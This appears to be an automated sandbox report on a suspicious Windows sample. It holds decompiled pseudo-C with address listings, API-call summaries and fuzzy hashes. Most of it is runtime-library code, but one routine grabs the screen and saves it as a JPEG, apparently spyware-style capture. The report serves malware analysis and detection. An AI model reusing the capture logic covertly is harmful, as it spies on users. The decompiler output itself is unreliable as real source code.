                                                                                                                                      							__eflags = _t96 - _t90;
                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                      							_t66 = _t60 & _t90;
                                                                                                                                      							_t87 = _t96 + 8;
                                                                                                                                      							__eflags = _t66 - 0x400;
                                                                                                                                      							if(_t66 > 0x400) {
                                                                                                                                      								__eflags = _t96 - _t87;
                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                      								_t101 = E013151CD(_t87, _t66 & _t87);
                                                                                                                                      								_pop(_t87);
                                                                                                                                      								__eflags = _t101;
                                                                                                                                      								if(_t101 == 0) {
                                                                                                                                      									goto L35;
                                                                                                                                      								}
                                                                                                                                      								 *_t101 = 0xdddd;
                                                                                                                                      								L28:
                                                                                                                                      								_t101 =  &(_t101[4]);
                                                                                                                                      								goto L30;
                                                                                                                                      							}
                                                                                                                                      							__eflags = _t96 - _t87;
                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                      							E01322CE0();
                                                                                                                                      							_t101 = _t107;
                                                                                                                                      							__eflags = _t101;
                                                                                                                                      							if(_t101 == 0) {
                                                                                                                                      								goto L35;
                                                                                                                                      							}
                                                                                                                                      							 *_t101 = 0xcccc;
                                                                                                                                      							goto L28;
                                                                                                                                      						}
                                                                                                                                      						_t70 = _a28;
                                                                                                                                      						if(_t70 == 0) {
                                                                                                                                      							goto L37;
                                                                                                                                      						}
                                                                                                                                      						_t125 = _t105 - _t70;
                                                                                                                                      						if(_t105 > _t70) {
                                                                                                                                      							goto L36;
                                                                                                                                      						}
                                                                                                                                      						_t71 = E01314B47(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                                                                                                      						_t105 = _t71;
                                                                                                                                      						if(_t71 != 0) {
                                                                                                                                      							goto L37;
                                                                                                                                      						}
                                                                                                                                      						goto L36;
                                                                                                                                      					}
                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                      					_t72 = _t54 & _t95 + 0x00000008;
                                                                                                                                      					_t85 = _t95 + 8;
                                                                                                                                      					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                                                                                                      						__eflags = _t95 - _t85;
                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                      						_t81 = E013151CD(_t85, _t72 & _t85);
                                                                                                                                      						_pop(_t85);
                                                                                                                                      						__eflags = _t81;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							goto L36;
                                                                                                                                      						}
                                                                                                                                      						 *_t81 = 0xdddd;
                                                                                                                                      						L12:
                                                                                                                                      						_t81 =  &(_t81[4]);
                                                                                                                                      						goto L14;
                                                                                                                                      					}
                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                      					E01322CE0();
                                                                                                                                      					_t81 = _t107;
                                                                                                                                      					if(_t81 == 0) {
                                                                                                                                      						goto L36;
                                                                                                                                      					}
                                                                                                                                      					 *_t81 = 0xcccc;
                                                                                                                                      					goto L12;
                                                                                                                                      				}
                                                                                                                                      			}


























                                                                                                                                      0x01313e1a
                                                                                                                                      0x01313e1b
                                                                                                                                      0x01313e1c
                                                                                                                                      0x01313e23
                                                                                                                                      0x01313e27
                                                                                                                                      0x01313e28
                                                                                                                                      0x01313e2e
                                                                                                                                      0x01313e34
                                                                                                                                      0x01313e3a
                                                                                                                                      0x01313e3d
                                                                                                                                      0x01313e3d
                                                                                                                                      0x01313e40
                                                                                                                                      0x01313e42
                                                                                                                                      0x01313e42
                                                                                                                                      0x01313e40
                                                                                                                                      0x01313e44
                                                                                                                                      0x01313e49
                                                                                                                                      0x01313e50
                                                                                                                                      0x01313e53
                                                                                                                                      0x01313e53
                                                                                                                                      0x01313e6f
                                                                                                                                      0x01313e75
                                                                                                                                      0x01313e7a
                                                                                                                                      0x0131400d
                                                                                                                                      0x01314020
                                                                                                                                      0x01313e80
                                                                                                                                      0x01313e80
                                                                                                                                      0x01313e83
                                                                                                                                      0x01313e88
                                                                                                                                      0x01313e8c
                                                                                                                                      0x01313ee0
                                                                                                                                      0x01313ee0
                                                                                                                                      0x01313ee2
                                                                                                                                      0x01313ee4
                                                                                                                                      0x01314002
                                                                                                                                      0x01314002
                                                                                                                                      0x01314004
                                                                                                                                      0x01314005
                                                                                                                                      0x00000000
                                                                                                                                      0x0131400b
                                                                                                                                      0x01313ef5
                                                                                                                                      0x01313efb
                                                                                                                                      0x01313efd
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01313f03
                                                                                                                                      0x01313f15
                                                                                                                                      0x01313f1a
                                                                                                                                      0x01313f1e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01313f2b
                                                                                                                                      0x01313f65
                                                                                                                                      0x01313f68
                                                                                                                                      0x01313f6b
                                                                                                                                      0x01313f6d
                                                                                                                                      0x01313f6f
                                                                                                                                      0x01313f71
                                                                                                                                      0x01313fbd
                                                                                                                                      0x01313fbd
                                                                                                                                      0x01313fbf
                                                                                                                                      0x01313fbf
                                                                                                                                      0x01313fc1
                                                                                                                                      0x01313ffb
                                                                                                                                      0x01313ffc
                                                                                                                                      0x00000000
                                                                                                                                      0x01314001
                                                                                                                                      0x01313fd5
                                                                                                                                      0x01313fda
                                                                                                                                      0x01313fdc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01313fe0
                                                                                                                                      0x01313fe1
                                                                                                                                      0x01313fe2
                                                                                                                                      0x01313fe5
                                                                                                                                      0x01314021
                                                                                                                                      0x01314024
                                                                                                                                      0x01313fe7
                                                                                                                                      0x01313fe7
                                                                                                                                      0x01313fe8
                                                                                                                                      0x01313fe8
                                                                                                                                      0x01313ff5
                                                                                                                                      0x01313ff7
                                                                                                                                      0x01313ff9
                                                                                                                                      0x0131402a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01313ff9
                                                                                                                                      0x01313f73
                                                                                                                                      0x01313f76
                                                                                                                                      0x01313f78
                                                                                                                                      0x01313f7a
                                                                                                                                      0x01313f7c
                                                                                                                                      0x01313f7f
                                                                                                                                      0x01313f84
                                                                                                                                      0x01313f9f
                                                                                                                                      0x01313fa1
                                                                                                                                      0x01313fab
                                                                                                                                      0x01313fad
                                                                                                                                      0x01313fae
                                                                                                                                      0x01313fb0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01313fb2
                                                                                                                                      0x01313fb8
                                                                                                                                      0x01313fb8
                                                                                                                                      0x00000000
                                                                                                                                      0x01313fb8
                                                                                                                                      0x01313f86
                                                                                                                                      0x01313f88
                                                                                                                                      0x01313f8c
                                                                                                                                      0x01313f91
                                                                                                                                      0x01313f93
                                                                                                                                      0x01313f95
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01313f97
                                                                                                                                      0x00000000
                                                                                                                                      0x01313f97
                                                                                                                                      0x01313f2d
                                                                                                                                      0x01313f32
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01313f38
                                                                                                                                      0x01313f3a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01313f51
                                                                                                                                      0x01313f56
                                                                                                                                      0x01313f5a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01313f60
                                                                                                                                      0x01313e93
                                                                                                                                      0x01313e95
                                                                                                                                      0x01313e97
                                                                                                                                      0x01313e9f
                                                                                                                                      0x01313ebe
                                                                                                                                      0x01313ec0
                                                                                                                                      0x01313eca
                                                                                                                                      0x01313ecc
                                                                                                                                      0x01313ecd
                                                                                                                                      0x01313ecf
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01313ed5
                                                                                                                                      0x01313edb
                                                                                                                                      0x01313edb
                                                                                                                                      0x00000000
                                                                                                                                      0x01313edb
                                                                                                                                      0x01313ea3
                                                                                                                                      0x01313ea7
                                                                                                                                      0x01313eac
                                                                                                                                      0x01313eb0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01313eb6
                                                                                                                                      0x00000000
                                                                                                                                      0x01313eb6

                                                                                                                                      APIs
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,01310352,01310352,?,?,?,01314066,00000001,00000001,ACE85006), ref: 01313E6F
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,01314066,00000001,00000001,ACE85006,?,?,?), ref: 01313EF5
                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ACE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 01313FEF
                                                                                                                                      • __freea.LIBCMT ref: 01313FFC
                                                                                                                                        • Part of subcall function 013151CD: RtlAllocateHeap.NTDLL(00000000,0130969E,00000000,?,0130C747,00000002,00000000,?,?,?,013095B7,0130969E,00000004,00000000,00000000,00000000), ref: 013151FF
                                                                                                                                      • __freea.LIBCMT ref: 01314005
                                                                                                                                      • __freea.LIBCMT ref: 0131402A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                      • Opcode ID: 48da9e1efc75ada5034ea3febf42b8cd68675eba6eb8351f3425fd888bc0b9c2
                                                                                                                                      • Instruction ID: 72c12b48607693d2acbe33d10d3c48a58419746ae2b2d4df17a384573c571a6b
                                                                                                                                      • Opcode Fuzzy Hash: 48da9e1efc75ada5034ea3febf42b8cd68675eba6eb8351f3425fd888bc0b9c2
                                                                                                                                      • Instruction Fuzzy Hash: 2C51D672600216AFEB298F69CC41EBBBBA9EF44768F154629FD05D7148EB34DC44C6A0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                      			E0130CA5D(void* __ecx) {
                                                                                                                                      				void* _t4;
                                                                                                                                      				void* _t11;
                                                                                                                                      				void* _t16;
                                                                                                                                      				long _t25;
                                                                                                                                      				void* _t28;
                                                                                                                                      
                                                                                                                                      				if( *0x132e030 != 0xffffffff) {
                                                                                                                                      					_t25 = GetLastError();
                                                                                                                                      					_t11 = E0130DAED(__eflags,  *0x132e030);
                                                                                                                                      					__eflags = _t11 - 0xffffffff;
                                                                                                                                      					if(_t11 == 0xffffffff) {
                                                                                                                                      						L5:
                                                                                                                                      						_t11 = 0;
                                                                                                                                      					} else {
                                                                                                                                      						__eflags = _t11;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							_t4 = E0130DB28(__eflags,  *0x132e030, 0xffffffff);
                                                                                                                                      							_pop(_t16);
                                                                                                                                      							__eflags = _t4;
                                                                                                                                      							if(_t4 != 0) {
                                                                                                                                      								_push(0x28);
                                                                                                                                      								_push(1);
                                                                                                                                      								_t28 = E01313B8C(_t16);
                                                                                                                                      								__eflags = _t28;
                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                      									L8:
                                                                                                                                      									_t11 = 0;
                                                                                                                                      									E0130DB28(__eflags,  *0x132e030, 0);
                                                                                                                                      								} else {
                                                                                                                                      									__eflags = E0130DB28(__eflags,  *0x132e030, _t28);
                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                      										_t11 = _t28;
                                                                                                                                      										_t28 = 0;
                                                                                                                                      										__eflags = 0;
                                                                                                                                      									} else {
                                                                                                                                      										goto L8;
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      								L01310E9B(_t28);
                                                                                                                                      							} else {
                                                                                                                                      								goto L5;
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					SetLastError(_t25);
                                                                                                                                      					return _t11;
                                                                                                                                      				} else {
                                                                                                                                      					return 0;
                                                                                                                                      				}
                                                                                                                                      			}








                                                                                                                                      0x0130ca64
                                                                                                                                      0x0130ca77
                                                                                                                                      0x0130ca7e
                                                                                                                                      0x0130ca81
                                                                                                                                      0x0130ca84
                                                                                                                                      0x0130ca9d
                                                                                                                                      0x0130ca9d
                                                                                                                                      0x0130ca86
                                                                                                                                      0x0130ca86
                                                                                                                                      0x0130ca88
                                                                                                                                      0x0130ca92
                                                                                                                                      0x0130ca98
                                                                                                                                      0x0130ca99
                                                                                                                                      0x0130ca9b
                                                                                                                                      0x0130caa2
                                                                                                                                      0x0130caa4
                                                                                                                                      0x0130caab
                                                                                                                                      0x0130caaf
                                                                                                                                      0x0130cab1
                                                                                                                                      0x0130cac5
                                                                                                                                      0x0130cac5
                                                                                                                                      0x0130cace
                                                                                                                                      0x0130cab3
                                                                                                                                      0x0130cac1
                                                                                                                                      0x0130cac3
                                                                                                                                      0x0130cad7
                                                                                                                                      0x0130cad9
                                                                                                                                      0x0130cad9
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0130cac3
                                                                                                                                      0x0130cadc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0130ca9b
                                                                                                                                      0x0130ca88
                                                                                                                                      0x0130cae4
                                                                                                                                      0x0130caee
                                                                                                                                      0x0130ca66
                                                                                                                                      0x0130ca68
                                                                                                                                      0x0130ca68

                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,0130CA54,0130A6F0), ref: 0130CA6B
                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0130CA79
                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0130CA92
                                                                                                                                      • SetLastError.KERNEL32(00000000,?,0130CA54,0130A6F0), ref: 0130CAE4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                      • Opcode ID: abbec525ec6ef6af23675fe6e47065718c38831ae04583896d6956c6016b0a78
                                                                                                                                      • Instruction ID: 4062cd5151b5cc5c613732ae28df07f82e0b90893e5fce47222469a68cc6d555
                                                                                                                                      • Opcode Fuzzy Hash: abbec525ec6ef6af23675fe6e47065718c38831ae04583896d6956c6016b0a78
                                                                                                                                      • Instruction Fuzzy Hash: 6901B532A1A6125EFA3B79FDBCA5A272BDCEB1177CB20537DE110850D4EA1148815280
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                      			E0131440F(void* __ebx, void* __ecx, void* __edx) {
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				intOrPtr _t2;
                                                                                                                                      				void* _t3;
                                                                                                                                      				void* _t4;
                                                                                                                                      				intOrPtr _t9;
                                                                                                                                      				void* _t11;
                                                                                                                                      				void* _t20;
                                                                                                                                      				void* _t21;
                                                                                                                                      				void* _t23;
                                                                                                                                      				void* _t25;
                                                                                                                                      				void* _t27;
                                                                                                                                      				void* _t29;
                                                                                                                                      				void* _t31;
                                                                                                                                      				void* _t32;
                                                                                                                                      				long _t36;
                                                                                                                                      				long _t37;
                                                                                                                                      				void* _t40;
                                                                                                                                      
                                                                                                                                      				_t29 = __edx;
                                                                                                                                      				_t23 = __ecx;
                                                                                                                                      				_t20 = __ebx;
                                                                                                                                      				_t36 = GetLastError();
                                                                                                                                      				_t2 =  *0x132e11c; // 0x6
                                                                                                                                      				_t42 = _t2 - 0xffffffff;
                                                                                                                                      				if(_t2 == 0xffffffff) {
                                                                                                                                      					L2:
                                                                                                                                      					_t3 = E013145B8(_t23, 1, 0x364);
                                                                                                                                      					_t31 = _t3;
                                                                                                                                      					_pop(_t25);
                                                                                                                                      					if(_t31 != 0) {
                                                                                                                                      						_t4 = E01314944(_t25, _t36, __eflags,  *0x132e11c, _t31);
                                                                                                                                      						__eflags = _t4;
                                                                                                                                      						if(_t4 != 0) {
                                                                                                                                      							E01314281(_t25, _t31, 0x132f048);
                                                                                                                                      							E01314615(0);
                                                                                                                                      							_t40 = _t40 + 0xc;
                                                                                                                                      							__eflags = _t31;
                                                                                                                                      							if(_t31 == 0) {
                                                                                                                                      								goto L9;
                                                                                                                                      							} else {
                                                                                                                                      								goto L8;
                                                                                                                                      							}
                                                                                                                                      						} else {
                                                                                                                                      							_push(_t31);
                                                                                                                                      							goto L4;
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						_push(_t3);
                                                                                                                                      						L4:
                                                                                                                                      						E01314615();
                                                                                                                                      						_pop(_t25);
                                                                                                                                      						L9:
                                                                                                                                      						SetLastError(_t36);
                                                                                                                                      						E01313B49(_t20, _t29, _t31, _t36);
                                                                                                                                      						asm("int3");
                                                                                                                                      						_push(_t20);
                                                                                                                                      						_push(_t36);
                                                                                                                                      						_push(_t31);
                                                                                                                                      						_t37 = GetLastError();
                                                                                                                                      						_t21 = 0;
                                                                                                                                      						_t9 =  *0x132e11c; // 0x6
                                                                                                                                      						_t45 = _t9 - 0xffffffff;
                                                                                                                                      						if(_t9 == 0xffffffff) {
                                                                                                                                      							L12:
                                                                                                                                      							_t32 = E013145B8(_t25, 1, 0x364);
                                                                                                                                      							_pop(_t27);
                                                                                                                                      							if(_t32 != 0) {
                                                                                                                                      								_t11 = E01314944(_t27, _t37, __eflags,  *0x132e11c, _t32);
                                                                                                                                      								__eflags = _t11;
                                                                                                                                      								if(_t11 != 0) {
                                                                                                                                      									E01314281(_t27, _t32, 0x132f048);
                                                                                                                                      									E01314615(_t21);
                                                                                                                                      									__eflags = _t32;
                                                                                                                                      									if(_t32 != 0) {
                                                                                                                                      										goto L19;
                                                                                                                                      									} else {
                                                                                                                                      										goto L18;
                                                                                                                                      									}
                                                                                                                                      								} else {
                                                                                                                                      									_push(_t32);
                                                                                                                                      									goto L14;
                                                                                                                                      								}
                                                                                                                                      							} else {
                                                                                                                                      								_push(_t21);
                                                                                                                                      								L14:
                                                                                                                                      								E01314615();
                                                                                                                                      								L18:
                                                                                                                                      								SetLastError(_t37);
                                                                                                                                      							}
                                                                                                                                      						} else {
                                                                                                                                      							_t32 = E013148EE(_t25, _t37, _t45, _t9);
                                                                                                                                      							if(_t32 != 0) {
                                                                                                                                      								L19:
                                                                                                                                      								SetLastError(_t37);
                                                                                                                                      								_t21 = _t32;
                                                                                                                                      							} else {
                                                                                                                                      								goto L12;
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						return _t21;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t31 = E013148EE(_t23, _t36, _t42, _t2);
                                                                                                                                      					if(_t31 != 0) {
                                                                                                                                      						L8:
                                                                                                                                      						SetLastError(_t36);
                                                                                                                                      						return _t31;
                                                                                                                                      					} else {
                                                                                                                                      						goto L2;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}





















                                                                                                                                      0x0131440f
                                                                                                                                      0x0131440f
                                                                                                                                      0x0131440f
                                                                                                                                      0x01314419
                                                                                                                                      0x0131441b
                                                                                                                                      0x01314420
                                                                                                                                      0x01314423
                                                                                                                                      0x01314431
                                                                                                                                      0x01314438
                                                                                                                                      0x0131443d
                                                                                                                                      0x01314440
                                                                                                                                      0x01314443
                                                                                                                                      0x01314455
                                                                                                                                      0x0131445a
                                                                                                                                      0x0131445c
                                                                                                                                      0x01314467
                                                                                                                                      0x0131446e
                                                                                                                                      0x01314473
                                                                                                                                      0x01314476
                                                                                                                                      0x01314478
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131445e
                                                                                                                                      0x0131445e
                                                                                                                                      0x00000000
                                                                                                                                      0x0131445e
                                                                                                                                      0x01314445
                                                                                                                                      0x01314445
                                                                                                                                      0x01314446
                                                                                                                                      0x01314446
                                                                                                                                      0x0131444b
                                                                                                                                      0x01314486
                                                                                                                                      0x01314487
                                                                                                                                      0x0131448d
                                                                                                                                      0x01314492
                                                                                                                                      0x01314495
                                                                                                                                      0x01314496
                                                                                                                                      0x01314497
                                                                                                                                      0x0131449e
                                                                                                                                      0x013144a0
                                                                                                                                      0x013144a2
                                                                                                                                      0x013144a7
                                                                                                                                      0x013144aa
                                                                                                                                      0x013144b8
                                                                                                                                      0x013144c4
                                                                                                                                      0x013144c7
                                                                                                                                      0x013144ca
                                                                                                                                      0x013144dc
                                                                                                                                      0x013144e1
                                                                                                                                      0x013144e3
                                                                                                                                      0x013144ee
                                                                                                                                      0x013144f4
                                                                                                                                      0x013144fc
                                                                                                                                      0x013144fe
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013144e5
                                                                                                                                      0x013144e5
                                                                                                                                      0x00000000
                                                                                                                                      0x013144e5
                                                                                                                                      0x013144cc
                                                                                                                                      0x013144cc
                                                                                                                                      0x013144cd
                                                                                                                                      0x013144cd
                                                                                                                                      0x01314500
                                                                                                                                      0x01314501
                                                                                                                                      0x01314501
                                                                                                                                      0x013144ac
                                                                                                                                      0x013144b2
                                                                                                                                      0x013144b6
                                                                                                                                      0x01314509
                                                                                                                                      0x0131450a
                                                                                                                                      0x01314510
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013144b6
                                                                                                                                      0x01314517
                                                                                                                                      0x01314517
                                                                                                                                      0x01314425
                                                                                                                                      0x0131442b
                                                                                                                                      0x0131442f
                                                                                                                                      0x0131447a
                                                                                                                                      0x0131447b
                                                                                                                                      0x01314485
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131442f

                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,0130E1E0,?,74CB6490,?,0130E5E6,?,74CB6490,?,00000000), ref: 01314413
                                                                                                                                      • _free.LIBCMT ref: 01314446
                                                                                                                                      • _free.LIBCMT ref: 0131446E
                                                                                                                                      • SetLastError.KERNEL32(00000000,74CB6490,?,00000000), ref: 0131447B
                                                                                                                                      • SetLastError.KERNEL32(00000000,74CB6490,?,00000000), ref: 01314487
                                                                                                                                      • _abort.LIBCMT ref: 0131448D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                      • Opcode ID: 042a55f4cae5e5a5cc924326829afc053f7854ad2afdf46c6b6b0b155519ec33
                                                                                                                                      • Instruction ID: d27d0526c8d647d8d2328621b05590b999b5f8a2924fa5ae34e06ab91e896f95
                                                                                                                                      • Opcode Fuzzy Hash: 042a55f4cae5e5a5cc924326829afc053f7854ad2afdf46c6b6b0b155519ec33
                                                                                                                                      • Instruction Fuzzy Hash: 66F0C83568061266D63E7A7C7C09A6E256E9BE2B7DF35812CF414B35CCFF2484034251
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 73%
                                                                                                                                      			E01306A43(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* _t31;
                                                                                                                                      				intOrPtr* _t37;
                                                                                                                                      				void* _t51;
                                                                                                                                      				void* _t52;
                                                                                                                                      				intOrPtr* _t54;
                                                                                                                                      				void* _t56;
                                                                                                                                      				void* _t60;
                                                                                                                                      				void* _t63;
                                                                                                                                      				signed int _t72;
                                                                                                                                      				void* _t76;
                                                                                                                                      				void* _t79;
                                                                                                                                      				void* _t82;
                                                                                                                                      
                                                                                                                                      				_t72 = __edx;
                                                                                                                                      				_t56 = __ecx;
                                                                                                                                      				E01323174(E013236FF, __edx, __eflags);
                                                                                                                                      				_t31 = E013027E1(_t82 - 0x9c, _t72, _t56);
                                                                                                                                      				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                                                                                                                                      				E013031AE(_t82 - 0x84, _t31, _t76, L"jpg");
                                                                                                                                      				_t60 = _t82 - 0x9c;
                                                                                                                                      				 *(_t82 - 4) = 2;
                                                                                                                                      				E01302755(_t60, _t31, __eflags);
                                                                                                                                      				E01306561(_t82 - 0x5c, _t72, __eflags);
                                                                                                                                      				_t63 = _t82 - 0x5c;
                                                                                                                                      				 *(_t82 - 4) = 3;
                                                                                                                                      				_t37 =  *0x132f8dc(E0130282E(_t63, __eflags), E01302709(), _t60, _t76, _t79, _t52);
                                                                                                                                      				_t54 = _t37;
                                                                                                                                      				E013062DA(_t82 - 0x24, _t54);
                                                                                                                                      				 *(_t82 - 4) = 4;
                                                                                                                                      				E013068F2(L"image/jpeg", _t82 - 0x6c, _t79);
                                                                                                                                      				 *((intOrPtr*)(_t82 - 0x14)) = 0x4b;
                                                                                                                                      				 *((intOrPtr*)(_t82 - 0x44)) = 1;
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				 *((intOrPtr*)(_t82 - 0x30)) = 1;
                                                                                                                                      				 *((intOrPtr*)(_t82 - 0x28)) = _t82 - 0x14;
                                                                                                                                      				 *((intOrPtr*)(_t82 - 0x2c)) = 4;
                                                                                                                                      				E0130634D(E01302712(_t82 - 0x84, 1), _t82 - 0x24, _t45, _t82 - 0x6c, _t82 - 0x44);
                                                                                                                                      				E013062FD( *((intOrPtr*)( *_t54 + 8))(_t54, _t63), _t82 - 0x24);
                                                                                                                                      				E013028AF(_t82 - 0x5c, _t82 - 0x6c, 1);
                                                                                                                                      				_t51 = E01302755(_t82 - 0x84, _t82 - 0x6c, 1);
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0xc));
                                                                                                                                      				return _t51;
                                                                                                                                      			}

















                                                                                                                                      0x01306a43
                                                                                                                                      0x01306a43
                                                                                                                                      0x01306a48
                                                                                                                                      0x01306a5f
                                                                                                                                      0x01306a64
                                                                                                                                      0x01306a75
                                                                                                                                      0x01306a7b
                                                                                                                                      0x01306a81
                                                                                                                                      0x01306a85
                                                                                                                                      0x01306a90
                                                                                                                                      0x01306a96
                                                                                                                                      0x01306a99
                                                                                                                                      0x01306aa9
                                                                                                                                      0x01306ab0
                                                                                                                                      0x01306ab6
                                                                                                                                      0x01306abe
                                                                                                                                      0x01306ac7
                                                                                                                                      0x01306ace
                                                                                                                                      0x01306ad9
                                                                                                                                      0x01306ae7
                                                                                                                                      0x01306ae8
                                                                                                                                      0x01306ae9
                                                                                                                                      0x01306aea
                                                                                                                                      0x01306aeb
                                                                                                                                      0x01306af1
                                                                                                                                      0x01306afb
                                                                                                                                      0x01306b0c
                                                                                                                                      0x01306b1a
                                                                                                                                      0x01306b22
                                                                                                                                      0x01306b2d
                                                                                                                                      0x01306b37
                                                                                                                                      0x01306b40

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01306A48
                                                                                                                                        • Part of subcall function 01306561: __EH_prolog.LIBCMT ref: 01306566
                                                                                                                                        • Part of subcall function 01306561: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01306589
                                                                                                                                        • Part of subcall function 01306561: CreateCompatibleDC.GDI32(00000000), ref: 01306595
